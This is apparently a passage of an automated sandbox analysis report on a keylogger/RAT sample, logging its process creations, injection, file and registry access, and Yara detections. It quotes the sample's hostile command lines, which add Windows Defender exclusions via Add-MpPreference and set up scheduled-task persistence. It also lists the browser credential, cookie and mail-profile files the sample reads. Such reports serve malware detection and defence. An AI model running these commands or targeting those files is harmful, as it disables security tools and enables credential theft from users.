Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Memory written: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Memory written: C:\Users\user\AppData\Roaming\AcEnrS.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AcEnrS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process created: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Process created: C:\Users\user\AppData\Roaming\AcEnrS.exe "C:\Users\user\AppData\Roaming\AcEnrS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Users\user\AppData\Roaming\AcEnrS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Users\user\AppData\Roaming\AcEnrS.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
